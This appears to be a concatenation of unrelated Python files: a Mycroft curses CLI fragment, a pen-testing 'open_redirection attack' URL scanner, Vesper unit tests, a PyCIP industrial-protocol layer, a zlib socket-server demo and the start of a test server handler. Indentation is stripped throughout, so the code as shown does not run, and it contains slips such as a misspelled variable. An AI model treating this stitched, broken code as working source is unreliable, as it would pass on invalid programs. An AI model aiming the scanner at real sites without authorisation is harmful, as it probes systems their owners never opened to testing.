prompt = "Input (':' for command, Ctrl+C to quit)"
if show_last_key:
prompt += " === keycode: "+last_key
scr.addstr(curses.LINES - 2, 0,
make_titlebar(prompt,
curses.COLS - 1),
CLR_HEADING)
scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING)
_do_meter(cy_chat_area + 2)
scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT)
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def make_titlebar(title, bar_length):
return title + " " + ("=" * (bar_length - 1 - len(title)))
##############################################################################
# Help system
help_struct = [
(
'Log Scrolling shortcuts',
[
("Up / Down / PgUp / PgDn", "scroll thru history"),
("Ctrl+T / Ctrl+PgUp", "scroll to top of logs (jump to oldest)"),
("Ctrl+B / Ctrl+PgDn", "scroll to bottom of logs" +
"(jump to newest)"),
("Left / Right", "scroll long lines left/right"),
("Home / End", "scroll to start/end of long lines")
]
),
(
"Query History shortcuts",
[
("Ctrl+N / Ctrl+Right", "previous query"),
("Ctrl+P / Ctrl+Left", "next query")
]
),
(
"General Commands (type ':' to enter command mode)",
[
(":quit or :exit", "exit the program"),
(":meter (show|hide)", "display the microphone level"),
(":keycode (show|hide)", "display typed key codes (mainly debugging)"),
(":history (# lines)", "set size of visible history buffer"),
(":clear", "flush the logs")
]
),
(
"Log Manipulation Commands",
[
(":filter 'STR'", "adds a log filter (optional quotes)"),
(":filter remove 'STR'", "removes a log filter"),
(":filter (clear|reset)", "reset filters"),
(":filter (show|list)", "display current filters"),
(":find 'STR'", "show logs containing 'str'"),
(":log level (DEBUG|INFO|ERROR)", "set logging level"),
(":log bus (on|off)", "control logging of messagebus messages")
]
),
(
"Skill Debugging Commands",
[
(":skills", "list installed skills"),
(":activate SKILL", "activate skill, e.g. 'activate skill-wiki'"),
(":deactivate SKILL", "deactivate skill"),
(":keep SKILL", "deactivate all skills except " +
"the indicated skill")
]
)
]
help_longest = 0
for s in help_struct:
for ent in s[1]:
help_longest = max(help_longest, len(ent[0]))
HEADER_SIZE = 2
HEADER_FOOTER_SIZE = 4
def num_help_pages():
lines = 0
for section in help_struct:
lines += 3 + len(section[1])
return ceil(lines / (curses.LINES - HEADER_FOOTER_SIZE))
def do_draw_help(scr):
def render_header():
scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING)
scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING)
def render_help(txt, y_pos, i, first_line, last_line, clr):
if i >= first_line and i < last_line:
scr.addstr(y_pos, 0, txt, clr)
y_pos += 1
return y_pos
def render_footer(page, total):
text = "Page {} of {} [ Any key to continue ]".format(page, total)
scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING)
scr.erase()
render_header()
y = HEADER_SIZE
page = subscreen + 1
# Find first and last taking into account the header and footer
first = subscreen * (curses.LINES - HEADER_FOOTER_SIZE)
last = first + (curses.LINES - HEADER_FOOTER_SIZE)
i = 0
for section in help_struct:
y = render_help(section[0], y, i, first, last, CLR_HEADING)
i += 1
y = render_help("=" * (curses.COLS - 1), y, i, first, last,
CLR_HEADING)
i += 1
for line in section[1]:
words = line[1].split()
ln = line[0].ljust(help_longest + 1)
for w in words:
if len(ln) + 1 + len(w) < curses.COLS:
ln += " "+w
else:
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
ln = " ".ljust(help_longest + 2) + w
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
i += 1
y = render_help(" ", y, i, first, last, CLR_CMDLINE)
i += 1
if i > last:
break
render_footer(page, num_help_pages())
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def show_help():
global screen_mode
global subscreen
if screen_mode != SCR_HELP:
screen_mode = SCR_HELP
subscreen = 0
set_screen_dirty()
def show_next_help():
global screen_mode
global subscreen
if screen_mode == SCR_HELP:
subscreen += 1
if subscreen >= num_help_pages():
screen_mode = SCR_MAIN
set_screen_dirty()
##############################################################################
# Skill debugging
def show_skills(skills):
"""
Show list of loaded skills in as many column as necessary
"""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Loaded skills", CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 0
prepare_page()
col_width = 0
skill_names = sorted(skills.keys())
for skill in skill_names:
if skills[skill]['active']:
color = curses.color_pair(4)
else:
color = curses.color_pair(2)
scr.addstr(row, column, " {}".format(skill), color)
row += 1
col_width = max(col_width, len(skill))
if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]:
column = 0
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
scr.get_wch() # blocks
prepare_page()
elif row == curses.LINES - 2:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
column += col_width + 2
col_width = 0
if column > curses.COLS - 20:
# End of screen
break
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def center(str_len):
# generate number of characters needed to center a string
# of the given length
return " " * ((curses.COLS - str_len) // 2)
##############################################################################
# Main UI lopo
def _get_cmd_param(cmd, keyword):
# Returns parameter to a command. Will de-quote.
# Ex: find 'abc def' returns: abc def
# find abc def returns: abc def
if isinstance(keyword, list):
for w in keyword:
cmd = cmd.replace(w, "").strip()
else:
cmd = cmd.replace(keyword, "").strip()
if not cmd:
return None
last_char = cmd[-1]
if last_char == '"' or last_char == "'":
parts = cmd.split(last_char)
return parts[-2]
else:
parts = cmd.split(" ")
return parts[-1]
def handle_cmd(cmd):
global show_meter
global screen_mode
global log_filters
global cy_chat_area
global find_str
global show_last_key
if "show" in cmd and "log" in cmd:
pass
elif "help" in cmd:
show_help()
elif "exit" in cmd or "quit" in cmd:
return 1
elif "keycode" in cmd:
# debugging keyboard
if "hide" in cmd or "off" in cmd:
show_last_key = False
elif "show" in cmd or "on" in cmd:
show_last_key = True
elif "meter" in cmd:
# microphone level meter
if "hide" in cmd or "off" in cmd:
show_meter = False
elif "show" in cmd or "on" in cmd:
show_meter = True
elif "find" in cmd:
find_str = _get_cmd_param(cmd, "find")
rebuild_filtered_log()
elif "filter" in cmd:
if "show" in cmd or "list" in cmd:
# display active filters
add_log_message("Filters: " + str(log_filters))
return
if "reset" in cmd or "clear" in cmd:
log_filters = list(default_log_filters)
else:
# extract last word(s)
param = _get_cmd_param(cmd, "filter")
if param:
if "remove" in cmd and param in log_filters:
log_filters.remove(param)
else:
log_filters.append(param)
rebuild_filtered_log()
add_log_message("Filters: " + str(log_filters))
elif "clear" in cmd:
clear_log()
elif "log" in cmd:
# Control logging behavior in all Mycroft processes
if "level" in cmd:
level = _get_cmd_param(cmd, ["log", "level"])
bus.emit(Message("mycroft.debug.log", data={'level': level}))
elif "bus" in cmd:
state = _get_cmd_param(cmd, ["log", "bus"]).lower()
if state in ["on", "true", "yes"]:
bus.emit(Message("mycroft.debug.log", data={'bus': True}))
elif state in ["off", "false", "no"]:
bus.emit(Message("mycroft.debug.log", data={'bus': False}))
elif "history" in cmd:
# extract last word(s)
lines = int(_get_cmd_param(cmd, "history"))
if not lines or lines < 1:
lines = 1
max_chat_area = curses.LINES - 7
if lines > max_chat_area:
lines = max_chat_area
cy_chat_area = lines
elif "skills" in cmd:
# List loaded skill
message = bus.wait_for_response(
Message('skillmanager.list'), reply_type='mycroft.skills.list')
if message:
show_skills(message.data)
scr.get_wch() # blocks
screen_mode = SCR_MAIN
set_screen_dirty()
elif "deactivate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.deactivate", data={'skill': s}))
else:
add_log_message('Usage :deactivate SKILL [SKILL2] [...]')
elif "keep" in cmd:
s = cmd.split()
if len(s) > 1:
bus.emit(Message("skillmanager.keep", data={'skill': s[1]}))
else:
add_log_message('Usage :keep SKILL')
elif "activate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.activate", data={'skill': s}))
else:
add_log_message('Usage :activate SKILL [SKILL2] [...]')
# TODO: More commands
return 0 # do nothing upon return
def handle_is_connected(msg):
add_log_message("Connected to Messagebus!")
# start_qml_gui(bus, gui_text)
def handle_reconnecting():
add_log_message("Looking for Messagebus websocket...")
def gui_main(stdscr):
global scr
global bus
global line
global log_line_lr_scroll
global longest_visible_line
global find_str
global last_key
global history
global screen_lock
global show_gui
global config
scr = stdscr
init_screen()
scr.keypad(1)
scr.notimeout(True)
bus.on('speak', handle_speak)
bus.on('message', handle_message)
bus.on('recognizer_loop:utterance', handle_utterance)
bus.on('connected', handle_is_connected)
bus.on('reconnecting', handle_reconnecting)
add_log_message("Establishing Mycroft Messagebus connection...")
gui_thread = ScreenDrawThread()
gui_thread.setDaemon(True) # this thread won't prevent prog from exiting
gui_thread.start()
hist_idx = -1 # index, from the bottom
c = 0
try:
while True:
set_screen_dirty()
c = 0
code = 0
try:
if ctrl_c_pressed():
# User hit Ctrl+C. treat same as Ctrl+X
c = 24
else:
# Don't block, this allows us to refresh the screen while
# waiting on initial messagebus connection, etc
scr.timeout(1)
c = scr.get_wch() # unicode char or int for special keys
if c == -1:
continue
except curses.error:
# This happens in odd cases, such as when you Ctrl+Z
# the CLI and then resume. Curses fails on get_wch().
continue
if isinstance(c, int):
code = c
else:
code = ord(c)
# Convert VT100 ESC codes generated by some terminals
if code == 27:
# NOTE: Not sure exactly why, but the screen can get corrupted
# if we draw to the screen while doing a scr.getch(). So
# lock screen updates until the VT100 sequence has been
# completely read.
with screen_lock:
scr.timeout(0)
c1 = -1
start = time.time()
while c1 == -1:
c1 = scr.getch()
if time.time()-start > 1:
break # 1 second timeout waiting for ESC code
c2 = -1
while c2 == -1:
c2 = scr.getch()
if time.time()-start > 1: # 1 second timeout
break # 1 second timeout waiting for ESC code
if c1 == 79 and c2 == 120:
c = curses.KEY_UP
elif c1 == 79 and c2 == 116:
c = curses.KEY_LEFT
elif c1 == 79 and c2 == 114:
c = curses.KEY_DOWN
elif c1 == 79 and c2 == 118:
c = curses.KEY_RIGHT
elif c1 == 79 and c2 == 121:
c = curses.KEY_PPAGE # aka PgUp
elif c1 == 79 and c2 == 115:
c = curses.KEY_NPAGE # aka PgDn
elif c1 == 79 and c2 == 119:
c = curses.KEY_HOME
elif c1 == 79 and c2 == 113:
c = curses.KEY_END
else:
c = c1
if c1 != -1:
last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2)
code = c
else:
last_key = "ESC"
else:
if code < 33:
last_key = str(code)
else:
last_key = str(code)
scr.timeout(-1) # resume blocking
if code == 27: # Hitting ESC twice clears the entry line
hist_idx = -1
line = ""
elif c == curses.KEY_RESIZE:
# Generated by Curses when window/screen has been resized
y, x = scr.getmaxyx()
curses.resizeterm(y, x)
# resizeterm() causes another curses.KEY_RESIZE, so
# we need to capture that to prevent a loop of resizes
c = scr.get_wch()
elif screen_mode == SCR_HELP:
# in Help mode, any key goes to next page
show_next_help()
continue
elif c == '\n' or code == 10 or code == 13 or code == 343:
# ENTER sends the typed line to be processed by Mycroft
if line == "":
continue
if line[:1] == ":":
# Lines typed like ":help" are 'commands'
if handle_cmd(line[1:]) == 1:
break
else:
# Treat this as an utterance
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()],
'lang': config.get('lang', 'en-us')}))
hist_idx = -1
line = ""
elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous)
# Move up the history stack
hist_idx = clamp(hist_idx + 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next)
# Move down the history stack
hist_idx = clamp(hist_idx - 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif c == curses.KEY_LEFT:
# scroll long log lines left
log_line_lr_scroll += curses.COLS // 4
elif c == curses.KEY_RIGHT:
# scroll long log lines right
log_line_lr_scroll -= curses.COLS // 4
if log_line_lr_scroll < 0:
log_line_lr_scroll = 0
elif c == curses.KEY_HOME:
# HOME scrolls log lines all the way to the start
log_line_lr_scroll = longest_visible_line
elif c == curses.KEY_END:
# END scrolls log lines all the way to the end
log_line_lr_scroll = 0
elif c == curses.KEY_UP:
scroll_log(False, 1)
elif c == curses.KEY_DOWN:
scroll_log(True, 1)
elif c == curses.KEY_NPAGE: # aka PgDn
# PgDn to go down a page in the logs
scroll_log(True)
elif c == curses.KEY_PPAGE: # aka PgUp
# PgUp to go up a page in the logs
scroll_log(False)
elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn
scroll_log(True, max_log_lines)
elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp
scroll_log(False, max_log_lines)
elif code == curses.KEY_BACKSPACE or code == 127:
# Backspace to erase a character in the utterance
line = line[:-1]
elif code == 6: # Ctrl+F (Find)
line = ":find "
elif code == 7: # Ctrl+G (start GUI)
if show_gui is None:
start_qml_gui(bus, gui_text)
show_gui = not show_gui
elif code == 18: # Ctrl+R (Redraw)
scr.erase()
elif code == 24: # Ctrl+X (Exit)
if find_str:
# End the find session
find_str = None
rebuild_filtered_log()
elif line.startswith(":"):
# cancel command mode
line = ""
else:
# exit CLI
break
elif code > 31 and isinstance(c, str):
# Accept typed character in the utterance
line += c
finally:
scr.erase()
scr.refresh()
scr = None
def simple_cli():
global bSimple
bSimple = True
bus.on('speak', handle_speak)
try:
while True:
# Sleep for a while so all the output that results
# from the previous command finishes before we print.
time.sleep(1.5)
print("Input (Ctrl+C to quit):")
line = sys.stdin.readline()
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()]}))
except KeyboardInterrupt as e:
# User hit Ctrl+C to quit
print("")
except KeyboardInterrupt as e:
LOG.exception(e)
event_thread.exit()
sys.exit()
def connect_to_messagebus():
""" Connect to the mycroft messagebus and launch a thread handling the
connection.
Returns: WebsocketClient
"""
bus = MessageBusClient() # Mycroft messagebus connection
event_thread = Thread(target=connect, args=[bus])
event_thread.setDaemon(True)
event_thread.start()
return bus
|
open_redirection.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import ninja
import argparse
import timeit
import multiprocessing as mp
from urlparse import urlparse
import sys
# save_data의 경우는 함수마다 공격의 결과값을 판단하는 패턴이 다르므로 개별로 정의
class open_redirection(ninja.web):
def __init__(self, collection_saving_urls):
# connect the collection
self.collection_saving_urls = self.db[collection_saving_urls]
def save_data(self, urls):
self.collection_saving_results = self.db["report"]
for url in urls:
if urlparse(url)[4].find("http") != -1 or\
urlparse(url)[4].find("jsp") != -1 or\
urlparse(url)[4].find("php") != -1 or\
urlparse(url)[4].find("asp") != -1:
print url
self.collection_saving_results.insert({"url" : url,
"open redirection" : True
})
if __name__ == "__main__":
usage = '''./open_redirection.py -t testfire '''
parser = argparse.ArgumentParser(description = "open_redirection attack for pen testing",
usage = usage)
parser.add_argument("-t", "--table", required=True, help="collection that saved urls")
parser.add_argument("-p", "--payload", required=False, help="payload characters to attack")
parser.add_argument("-u", "--url", required=False, help="requests in origin_url")
parser.add_argument("-c", "--cookie", required=False, help="filename that contains a cookie")
parser.add_argument("-o", "--timeout", required=False, help="default timeout is 1 sec")
parser.add_argument("-v", "--version", action='version', version = 'JongWon Kim (dikien2012@gmail.com)\n%(prog)s - v.1.1 (05/05/2014)')
args = parser.parse_args()
collection_saving_urls = args.table
timeout = args.timeout
start_time = timeit.default_timer()
os_version = sys.platform
open_redirection = open_redirection(collection_saving_urls)
processes = []
# 공격에 필요한 url을 콜렉션에서 가져옴
urls = open_redirection.search_urls()
if os_version.find("win32") == -1:
for url in urls:
process = mp.Process(target = open_redirection.save_data, args=(url,))
processes.append(process)
process.start()
for item in processes:
item.join()
else:
for url in urls:
process = mp.Process(target = open_redirection.save_data(url))
end_time = timeit.default_timer()
print "*" * 120
print '\nattack is done: ', end_time - start_time
print "*" * 120
|
utilsTest.py
|
#:copyright: Copyright 2009-2010 by the Vesper team, see AUTHORS.
#:license: Dual licenced under the GPL or Apache2 licences, see LICENSE.
"""
utils unit tests
"""
import unittest
from vesper import utils
from vesper.utils import *
class utilsTestCase(unittest.TestCase):
def testSingleton(self):
class single: __metaclass__=Singleton
s1 = single()
s2 = single()
self.failUnless(s1 is s2)
def testDynException(self):
_defexception = DynaExceptionFactory(__name__)
_defexception('test dyn error') #defines exception NotFoundError
try:
raise TestDynError()
except (TestDynError), e:
self.failUnless(e.msg == "test dyn error")
try:
raise TestDynError("another msg")
except (TestDynError), e:
self.failUnless(e.msg == "another msg")
def testThreadlocalAttribute(self):
class HasThreadLocals(ObjectWithThreadLocals):
def __init__(self, bar):
#set values that will initialize across every thread
self.initThreadLocals(tl1 = 1, tl2 = bar)
test = HasThreadLocals('a')
test.tl1 = 2
test2 = HasThreadLocals('b')
self.failUnless(test.tl2 == 'a')
self.failUnless(test2.tl2 == 'b')
def threadMain():
#make sure the initial value are what we expect
self.failUnless(test.tl1 == 1)
self.failUnless(test.tl2 == 'a')
#change them
test.tl1 = 3
test.tl2 = 'b'
#make they're what we just set
self.failUnless(test.tl1 == 3)
self.failUnless(test.tl2 == 'b')
#make sure the initial values are what we expect
self.failUnless(test.tl1 == 2)
self.failUnless(test.tl2 == 'a')
thread1 = threading.Thread(target=threadMain)
thread1.start()
thread1.join()
#make sure there the values haven't been changed by the other thread
self.failUnless(test.tl1 == 2)
self.failUnless(test.tl2 == 'a')
def testDiffPatch(self):
orig = "A B C D E"
new = "A C E D"
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
orig = "A B B B E"
new = "A C C C"
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
orig = ""
new = "A C C C"
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
orig = "A B B B E"
new = ""
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
orig = ""
new = ""
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
orig = "A B B B E"
new = "A B B B E"
self.failUnless(new == patch(orig, diff(orig, new, 0, ' '), ' ') )
def _testSortedDiff(self, old, new):
#print old, 'to', new
changes = diffSortedList(old, new)
#print changes
patch = opcodes2Patch(old, new, changes)
#print patch
patchList(old, patch)
#print old
self.failUnless(new == old)
def testSortedDiff(self):
old = [1, 2, 6]
new = [0, 2, 4, 9]
self._testSortedDiff(old,new)
old = []
new = [0, 2, 4, 9]
self._testSortedDiff(old,new)
old = [1, 2, 6]
new = []
self._testSortedDiff(old,new)
old = [1, 2, 6]
new = [0, 2]
self._testSortedDiff(old,new)
old = [1, 2]
new = [0, 2, 3]
self._testSortedDiff(old,new)
old = []
new = []
self._testSortedDiff(old,new)
old = [0, 2, 3]
new = [0, 2, 3]
self._testSortedDiff(old,new)
def testMonkeyPatcher(self):
class NeedsPatching(object):
def buggy(self):
return 1
class unusedname(NeedsPatching):
__metaclass__ = MonkeyPatcher
def buggy(self):
return self.newFunc()
def newFunc(self):
return 2
def addedFunc(self):
return self.__class__.__name__
test = NeedsPatching()
self.failUnless(test.buggy() == 2)
self.failUnless(test.buggy_old_() == 1)
self.failUnless(test.addedFunc() == 'NeedsPatching')
if __name__ == '__main__':
import sys
try:
test=sys.argv[sys.argv.index("-r")+1]
tc = utilsTestCase(test)
getattr(tc, test)() #run test
except (IndexError, ValueError):
unittest.main()
|
CIP.py
|
from threading import Thread
#from multiprocessing import Process as Thread
from enum import IntEnum
from PyCIP.CIPModule.connection_manager_class import ConnectionManager
from PyCIP.DataTypesModule import *
from collections import OrderedDict
from PyCIP.Tools.signaling import Signaler, SignalerM2M
import struct
class Basic_CIP():
def __init__(self, transportLayer, **kwargs):
self.trans = transportLayer
self.sequence_number = 1
self.connected = False
self.OT_connection_id = None
self.TO_connection_id = None
self.active = True
self.transport_messenger = Signaler()
self.cip_messenger = SignalerM2M()
self._cip_manager_thread = Thread(target=self._CIP_manager, args=[self.trans], name="cip_layer")
self._cip_manager_thread.start()
def _CIP_manager(self, trans):
while self.active and self.trans.connected:
message_structure = self.transport_messenger.get_message(0.1)
if message_structure == None:
continue
packet = message_structure.message
signal_id = 0
# UnConnected Explicit
if (packet.CPF[0].Type_ID == CPF_Codes.NullAddress
and packet.CPF[1].Type_ID == CPF_Codes.UnconnectedData):
message_response = MessageRouterResponseStruct_UCMM()
message_response.import_data(packet.data)
packet.CIP = message_response
packet.data = packet.data[packet.CIP.sizeof():]
signal_id = packet.encapsulation_header.Sender_Context()
self.transport_messenger.unregister(message_structure.signal_id)
# Connected Explicit
elif(packet.CPF[0].Type_ID == CPF_Codes.ConnectedAddress
and packet.CPF[1].Type_ID == CPF_Codes.ConnectedData):
message_response = MessageRouterResponseStruct()
message_response.import_data(packet.data)
packet.CIP = message_response
packet.data = packet.data[packet.CIP.sizeof():]
signal_id = message_response.Sequence_Count
# Connected Implicit
elif(packet.CPF[0].Type_ID == CPF_Codes.SequencedAddress
and packet.CPF[1].Type_ID == CPF_Codes.ConnectedData):
print("Connected Implicit Not Supported Yet")
continue
self.cip_messenger.send_message(signal_id, packet)
return None
def get_next_sender_context(self):
return self.trans.get_next_sender_context()
def set_connection(self, OT_connection_id, TO_connection_id):
self.connected = True
self.OT_connection_id = OT_connection_id
self.TO_connection_id = TO_connection_id
def clear_connection(self):
self.connected = False
self.OT_connection_id = None
self.TO_connection_id = None
def explicit_message(self, service, EPath, data=None, receive=True):
packet = bytearray()
if self.connected:
self.sequence_number += 1
sequence_number = self.sequence_number
packet += struct.pack('H', sequence_number)
packet += explicit_request(service, EPath, data=data)
if receive:
receive_id = self.TO_connection_id if self.TO_connection_id else self.trans.get_next_sender_context()
# if we want the manager to be notified that this message has been responded too, we must register
self.transport_messenger.register(receive_id)
if self.connected:
receipt = sequence_number
else:
receipt = receive_id
self.cip_messenger.register(receipt)
else:
receive_id = None
# SEND PACKET
context = self.trans.send_encap(packet, self.OT_connection_id, receive_id)
return receipt
def receive(self, receive_id, time_out=5):
message = self.cip_messenger.get_message(receive_id, time_out)
if message:
return message.message
else:
return None
class ReplyService(BaseBitFieldStruct):
def __init__(self):
self.RequestResponse = BaseBitField(1)
self.Service = BaseBitField(7)
#vol1 ver 3.18 2-4.2
class MessageRouterResponseStruct(BaseStructureAutoKeys):
def __init__(self):
self.Sequence_Count = UINT()
self.Reply_Service = ReplyService()
self.Reserved = USINT()
self.General_Status = USINT()
self.Size_of_Additional_Status = USINT()
self.Additional_Status = ARRAY(WORD, self.Size_of_Additional_Status)
#vol1 ver 3.18 2-4.2
class MessageRouterResponseStruct_UCMM(BaseStructureAutoKeys):
def __init__(self):
self.Reply_Service = ReplyService()
self.Reserved = USINT()
self.General_Status = USINT()
self.Size_of_Additional_Status = USINT()
self.Additional_Status = ARRAY(WORD, self.Size_of_Additional_Status)
def explicit_request(service, EPath, data=None):
request = bytearray()
request.append(service)
EPath_bytes = EPath.export_data()
request.append(len(EPath_bytes)//2)
request += EPath_bytes
if data is not None:
request += data
return request
class CIP_Manager():
def __init__(self, transport, *EPath):
self.trans = transport
self.path = EPath
self.primary_connection = Basic_CIP(transport)
self.current_connection = self.primary_connection
self.connection_manager = ConnectionManager(self.primary_connection)
self.e_connected_connection = None
# if there is a path then we make a connection
if len(self.path):
self.forward_open(*EPath)
def forward_open(self, EPath=None, **kwargs):
if EPath == None:
self.path = EPATH()
self.path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, 2))
self.path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, 1))
else:
self.path = EPath
self._fwd_rsp = self.connection_manager.forward_open(self.path, **kwargs)
if self._fwd_rsp:
self.e_connected_connection = Basic_CIP(self.trans)
self.e_connected_connection.set_connection(self._fwd_rsp.OT_connection_ID, self._fwd_rsp.TO_connection_ID)
self.current_connection = self.e_connected_connection
return self._fwd_rsp
return False
def forward_close(self, EPath=None, **kwargs):
if EPath == None:
self.path = EPATH()
self.path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, 2))
self.path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, 1))
else:
self.path = EPath
fwd_rsp = self.connection_manager.forward_close(self.path, **kwargs)
if fwd_rsp:
self.current_connection.clear_connection()
del self.current_connection
return fwd_rsp
return False
def explicit_message(self, service, request_path, data=None, route=None, try_connected=True):
if try_connected and self.e_connected_connection and self.e_connected_connection.connected:
connection = self.e_connected_connection
receipt = connection.explicit_message(service, request_path, data=data)
elif route:
message = explicit_request(service, request_path, data=data)
connection = self.connection_manager
receipt = connection.unconnected_send(message, route)
else:
connection = self.primary_connection
receipt = connection.explicit_message(service, request_path, data=data)
return connection.receive(receipt)
def get_attr_single(self, class_int, instance_int, attribute_int, try_connected=True, route=None):
path = EPATH()
path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, class_int))
path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, instance_int))
path.append(LogicalSegment(LogicalType.AttributeID, LogicalFormat.bit_8, attribute_int))
return self.explicit_message(CIPServiceCode.get_att_single, path, try_connected=try_connected, route=route)
def get_attr_all(self, class_int, instance_int, try_connected=True, route=None):
path = EPATH()
path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, class_int))
path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, instance_int))
return self.explicit_message(CIPServiceCode.get_att_all, path, try_connected=try_connected, route=route)
def set_attr_single(self, class_int, instance_int, attribute_int, data, try_connected=True, route=None):
path = EPATH()
path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, class_int))
path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, instance_int))
path.append(LogicalSegment(LogicalType.AttributeID, LogicalFormat.bit_8, attribute_int))
return self.explicit_message(CIPServiceCode.set_att_single, path, try_connected=try_connected, route=route)
def set_attr_all(self, class_int, instance_int, attribute_int, data, try_connected=True, route=None):
path = EPATH()
path.append(LogicalSegment(LogicalType.ClassID, LogicalFormat.bit_8, class_int))
path.append(LogicalSegment(LogicalType.InstanceID, LogicalFormat.bit_8, instance_int))
return self.explicit_message(CIPServiceCode.set_att_single, path, try_connected=try_connected, route=route)
class RoutingType(IntEnum):
ExplicitDefault = 0,
ExplicitDirect = 1,
ExplicitConnected = 2,
ExplicitUnConnected = 3,
ImplicitDefault = 4,
ImplicitDirect = 5,
ImplicitConnected = 6,
ImplicitUnConnected = 7,
|
zlib_server.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
#__version__ = "$Id$"
#end_pymotw_header
import zlib
import logging
import SocketServer
import binascii
BLOCK_SIZE = 64
class ZlibRequestHandler(SocketServer.BaseRequestHandler):
logger = logging.getLogger('Server')
def handle(self):
compressor = zlib.compressobj(1)
# Find out what file the client wants
filename = self.request.recv(1024)
self.logger.debug('client asked for: "%s"', filename)
# Send chunks of the file as they are compressed
with open(filename, 'rb') as input:
while True:
block = input.read(BLOCK_SIZE)
if not block:
break
self.logger.debug('RAW "%s"', block)
compressed = compressor.compress(block)
if compressed:
self.logger.debug('SENDING "%s"',
binascii.hexlify(compressed))
self.request.send(compressed)
else:
self.logger.debug('BUFFERING')
# Send any data being buffered by the compressor
remaining = compressor.flush()
while remaining:
to_send = remaining[:BLOCK_SIZE]
remaining = remaining[BLOCK_SIZE:]
self.logger.debug('FLUSHING "%s"',
binascii.hexlify(to_send))
self.request.send(to_send)
return
if __name__ == '__main__':
import socket
import threading
from cStringIO import StringIO
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
logger = logging.getLogger('Client')
# Set up a server, running in a separate thread
address = ('localhost', 0) # let the kernel assign a port
server = SocketServer.TCPServer(address, ZlibRequestHandler)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True)
t.start()
# Connect to the server as a client
logger.info('Contacting server on %s:%s', ip, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Ask for a file
requested_file = 'lorem.txt'
logger.debug('sending filename: "%s"', requested_file)
len_sent = s.send(requested_file)
# Receive a response
buffer = StringIO()
decompressor = zlib.decompressobj()
while True:
response = s.recv(BLOCK_SIZE)
if not response:
break
logger.debug('READ "%s"', binascii.hexlify(response))
# Include any unconsumed data when feeding the decompressor.
to_decompress = decompressor.unconsumed_tail + response
while to_decompress:
decompressed = decompressor.decompress(to_decompress)
if decompressed:
logger.debug('DECOMPRESSED "%s"', decompressed)
buffer.write(decompressed)
# Look for unconsumed data due to buffer overflow
to_decompress = decompressor.unconsumed_tail
else:
logger.debug('BUFFERING')
to_decompress = None
# deal with data reamining inside the decompressor buffer
remainder = decompressor.flush()
if remainder:
logger.debug('FLUSHED "%s"', remainder)
buffer.write(reaminder)
full_response = buffer.getvalue()
lorem = open('lorem.txt', 'rt').read()
logger.debug('response matches file contents: %s',
full_response == lorem)
# Clean up
s.close()
server.socket.close()
|
TestServerHandler.py
|
from datetime import datetime, timezone
from wsgiref.handlers import format_date_time
from time import mktime
import http.client as hc
from socket import *
import threading
import config.config as cfg
# assign connection info
DEFAULT_IP = cfg.primary['ip']
DEFAULT_PORT = cfg.primary['port']
SECOND_IP = cfg.secondary['ip']
SECOND_PORT = cfg.secondary['port']
REQUESTED_IP = ''
REQUESTED_PORT = 8080
REQUESTED_FILE = ''
# init timestamps
CURRENT = datetime.now(timezone.utc).timestamp()
startTimeDefault = CURRENT
serverTimeDefault = CURRENT
startTimeMobile = CURRENT
END_STAMP_SECOND = CURRENT
DEFAULT_RANGE_END = 0
